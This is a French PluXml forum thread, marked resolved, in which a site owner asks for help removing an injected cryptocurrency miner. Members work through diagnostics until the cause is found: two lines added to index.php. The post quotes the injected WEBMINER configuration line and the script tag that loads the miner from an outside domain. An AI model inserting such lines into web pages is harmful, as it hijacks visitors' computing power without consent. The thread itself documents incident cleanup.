[RESOLU] SOS site Hacké !
problème peu courant, mais problème inquiétant !!!
je viens de voir que dans l'en-tête de mon site ( www.unesourisetmoi.info ), se trouve ceci :
"
WEBMINER.config({ login: "6157177", pass: null }).power(70);
<!DOCTYPE html>
"
Je ne parviens pas à trouver de où provient cette 'injection' de script malveillant ^^^^
ni même à la supprimer
- il n'y a rien , apparemment, dans les fichiers du thème ... : supprimés et remis = RAS
- passage au thème par défaut : le code malveillant est également présent !!!
- J'ai sur le même hébergement plusieurs dossiers réalisés avec PluXml ou autres et rien n'apparait ...
- le site tourne en 'local' sous "laragon" et cette injection n'existe pas ...
Voilà tout ce que j'ai pu trouver
Si vous pouvez m'aider = SUPER !!!
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -
Connectez-vous ou Inscrivez-vous pour répondre.
Réponses
Bonjour,
je confirme, avast me bloque l'accés au site du a un script malveillant.
Questions:
as tu modifié la config de ton hebergement ? (php, htacess, autre )?
depuis quand ?
as tu des backup sur ton hébergement ?
as tu des pubs fournies par un service extérieur et qui s'affichent sur tes pages? (cas classique de site momentanément bloqué du a un script embarqué par une pub malveillante)
as tu tenté de désactiver tes plugins et de les réactiver à un a un pour voir celui qui aurait une faille éventuelle?
utilise tu des js externes ?
etc.
Cdt
Cordialement,
gcyrillus , simple membre du forum et utilisateur de pluxml
Mon site PluXml: https://re7net.com | Plugins: https://ressources.pluxopolis.net/banque-plugins/index.php?all_versions | demos sur free http://gcyrillus.free.fr/new | Thèmes: tester et télécharger @ https://pluxthemes.com
Indiquez [RESOLU] dans le titre de votre question une fois le soucis réglè, Merci
j'ai nettoyé l'hébergement de tous les dossiers ou fichiers qui pouvaient me paraître suspects ...
j'ai effectivement une sauvegarde en local, que j'ai aussi 'nettoyée' et qui ( en local toujours ) ne donne pas du tout ce code
autres renseignements:
version de PluXml : 5.5
si cela risque de provenir des plugins, voici ceux qui sont en ligne :
UTILISES
jQuery 1.4.4 - Version 1.7.1 (24/12/2011)
plxSocialMeta - Version 0.0.1 (19/11/2014)
plxResponsiveSlidesJs - Version 1.0 (13/10/2013)
plxMyAutoMetaDescription - Version 1.1 (05/09/2013)
filAriane - Version 1.1 (21/01/2012)
ArtGalerie - Version 4.3 (21/07/2015) ( version personnalisée par Rockyhorror )
MySearch - Version 1.5.3 (13/05/2015)
scrollToTop - Version 1.0 (22/01/2012)
plxEditor - Version 1.4.1 (18/11/2015)
MyContact - Version 1.7 (20/07/2015)
Blogroll - Version 0.8 (26/07/2015)
MyAllArchive - Version 1.7.2 (02/09/2015)
prevNext - Version 1.0 (19/01/2014)
RSSroll w/ favicons - Version 1.1 (12/04/2013)
WDD_BanComment - Version 1.1 (11/07/2015)
ModerationList - Version 6 (30/08/2015)
NON UTILISES
AutoSave - Version 0.6 (17/07/2015)
ShareThis - Version 1.0 (21/10/2013)
WDD_cache - Version 1.0 (25/02/15)
About - Version 1.5 (12/06/2012)
MyPager - Version 1.6 (20/10/2015)
plxMinifyCache - Version 1.4 (20/04/2013)
MyAkismet - Version 1.2 (20/05/2015)
MyBetterUrls - Version 1.4.2 (13/05/2015)
MyBreadcrumb - Version 1.1 (05/09/2013)
MyCapchaImage - Version 1.3.1 (23/07/2015)
MyComRememberMe - Version 1.1 (05/09/2013)
MyLoremIpsum - Version 1.1 (04/06/2015)
MyMailComment - Version 1.2.2 (04/06/2015)
MyPager - Version 1.2.2 (13/05/2015)
MyPluginDownloader - Version 1.2 (27/01/2015)
MySkinSelect - Version 1.1.2 (05/11/2012)
MySocialButtons - Version 1.4.1 (06/11/2014)
ShareSocialButtons - Version 1.0.2 (23/07/2016)
plxToolbar - Version 1.3 (15/07/2015)
Ruban - Version 1.1 (12/10/2013)
Share Me - Version 0.67 (03/04/2016)
superContact - Version 1.2 (16/01/2014)
TinyNav - Version 0.9 Bêta (25/08/2013)
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -
Le hack ressemble à un script qui voudrait utilisé depuis ton site des ressources pour de le cryptage de crypto monnaie. un js est peut-être chargé à ton insu . peut-être injecter depuis le hook d'un ou plusieurs plugins?
edit:
en lançant un vieux tails sous linux , j'arrive à ouvrir ta page et je vois bien 2 balises script injectés avant le rendu de la page (peut-être un hook dans index.php détourné ou le htaccess? ).
Je ne connais pas tous ces plugins,
ceux qui peuvent être "dangereux" seront tous ceux qui permettent entre autre l'upload de fichier (si fonction mal encapsulé et accessible sans être logué) , ceux permettant aussi d’éditer, créer des fichiers peuvent aussi être dangereux si ces fonctions peuvent être détourné, via le traitement d'un formulaire par exemple.
Regarde le contenu des plugins, d'abord ceux permettant l'upload, embarquant un formulaire , ceux capable d'éditer/créer des fichiers et enfin les autres (actifs) Pour voir si des fichier ont étaient modifiés ou ajoutés.
Autre piste, ton fichier htaccess , as t-il était modifié?
Connais tu l'adresse IP de ton serveur, si oui, as tu le même soucis en passant par l'IP au lieu du nom de domaine ?
Si d'autres lisant ce post ont d'autres piste de recherches/idées, merci de les partagées
Bon, tu l'auras compris, l'idée est de cherché d’où ça vient, une fois trouvé, on pourra en chercher la cause
++
Cordialement,
gcyrillus , simple membre du forum et utilisateur de pluxml
Mon site PluXml: https://re7net.com | Plugins: https://ressources.pluxopolis.net/banque-plugins/index.php?all_versions | demos sur free http://gcyrillus.free.fr/new | Thèmes: tester et télécharger @ https://pluxthemes.com
Indiquez [RESOLU] dans le titre de votre question une fois le soucis réglè, Merci
Si je fais un essai
Penses-tu que cela pourrait nous servir ?
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -
oui bien sur, si un plugin est un cause, ça limitera le champ de recherche
Par contre bizarre, l'IP de ton site donne une 404 sur un hébergement nginx ? j'ai trouvé cette IP pour ton site 62.210.16.61 sans être certains qu'elle corresponde bien.
++
@bazooka07 si tu passes par ici pourrait tu nous éclairer avec ton expertise ? Cdt
Cordialement,
gcyrillus , simple membre du forum et utilisateur de pluxml
Mon site PluXml: https://re7net.com | Plugins: https://ressources.pluxopolis.net/banque-plugins/index.php?all_versions | demos sur free http://gcyrillus.free.fr/new | Thèmes: tester et télécharger @ https://pluxthemes.com
Indiquez [RESOLU] dans le titre de votre question une fois le soucis réglè, Merci
je vais faire le texte et je te tiens informé
pour le contenu du .htaccess, le voici
`RewriteEngine On
RewriteCond %{HTTP:HTTPS} !on
RewriteRule (.*) https://%{SERVER_NAME}/$1 [QSA,L,R=301]
BEGIN -- Pluxml
Options -Multiviews
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
Réécriture des urls
RewriteRule ^(?!feed)(.)$ index.php?$1 [L]
RewriteRule ^feed\/(.)$ feed.php?$1 [L]
END -- Pluxml
ErrorDocument 404 /index.php?article399/erreur-404
`
quant à l'adresse IP ... ??? je n'y connais rien ... l'hébergeur est 'online' ( Scaleway Dedibox - Scaleway SAS )...
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -
OUPS ... ben je me vois donc bien mal parti là ...
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -
@bg62 demande de l’assistance à ton hébergeur. Si ton site s'est fait hack, ils sont là pour t'aider.
Dans ton entête il y a surtout cette ligne à désactiver :
<script src="https://wm.bmwebm.org/WEBMINER.js"></script>
Tu dis que tu as supprimé tous les fichiers suspects, mais le mieux c'est de tout supprimer, vérifier ce qu'il se passe en installant une bete page index.php, et si rien de particulier, réinstaller tout ton site depuis une sauvegarde.
@kowalsky pour le 'hack' n'ayant pas l'option 'sauvegarde' sur l'hébergement je ne pense pas trop que l'assistance puisse m'être très utile ....
quant à enlever (tout) tester et replacer .. si je n'ai pas trouvé 'avant' de où provient cette injection je la remettrai aussi dans ce cas
pas évident
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -
re, si ton site est en hebergement mutualisé et que tu ne trouve rien sur ton FTP / fichiers du site, c'est probablement l'hebergement qui à étéit hacké (donc à priori tous les sites sur le même serveur) , donc comme le dit @kowalsky , c'est du ressort de ton hébergeur
Tu peut faire le test de kowalsky avec index.php . renomme le et met en un autre avec rien ou un morceau de html, puis vérifie le code source. si le script est toujours là , il n'y aurait que ton hébergeur pour solutionner le soucis surement communs à d'autre sites.
Maintenant j'ai
Ton hébergeur est peut-être déjà au courant et en train de remettre les choses au carré , contacte le tout de même
Cdt
Cordialement,
gcyrillus , simple membre du forum et utilisateur de pluxml
Mon site PluXml: https://re7net.com | Plugins: https://ressources.pluxopolis.net/banque-plugins/index.php?all_versions | demos sur free http://gcyrillus.free.fr/new | Thèmes: tester et télécharger @ https://pluxthemes.com
Indiquez [RESOLU] dans le titre de votre question une fois le soucis réglè, Merci
Essaie de voir dans d'autres dossiers existant sur le site comme
https://www.unesourisetmoi.info/tunisie/
https://www.unesourisetmoi.info/minimal/
https://www.unesourisetmoi.info/screensavers/
https://www.unesourisetmoi.info/ze/
https://www.unesourisetmoi.info/mer/
Etc. ..
apparemment rien au niveau du hack .... il n'y aurait que sur la partie principale avec 'PluXml' ....
🤔
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -
C’était le fichier index.php modifié avec ces deux lignes supplémentaire. aucune idée comment cela s'est produit
Cordialement,
gcyrillus , simple membre du forum et utilisateur de pluxml
Mon site PluXml: https://re7net.com | Plugins: https://ressources.pluxopolis.net/banque-plugins/index.php?all_versions | demos sur free http://gcyrillus.free.fr/new | Thèmes: tester et télécharger @ https://pluxthemes.com
Indiquez [RESOLU] dans le titre de votre question une fois le soucis réglè, Merci
SUPER !!! et grands mercis +100
Libéré d'un gros problème en quelques heures, c'est TOP de pouvoir trouver ainsi de l'aide rapide et totalement désintéressée, une des choses qui en 2023 commence à manquer cruellement en ce bas Monde
@kowalsky avait ... supputé mais il est vrai comme le dit @gcyrillus-nomade que ceci est plus que étrange car pas de traces sur l'hébergement, pas de trace non plus sur la sauvegarde en local ... un mystère, résolu, mais qui reste complet pour moi ...
à espérer que personne d'autre ne connaîtra la même mésaventure
bonne journée à tous
mes sites principaux : fonds d'écran gratuits - longue traîne - référencer votre site - brocante en ligne -